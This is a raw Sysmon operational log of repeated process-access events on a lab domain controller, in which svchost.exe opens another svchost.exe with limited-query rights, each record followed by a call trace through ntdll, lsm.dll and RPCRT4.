10341000x800000000000000011042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
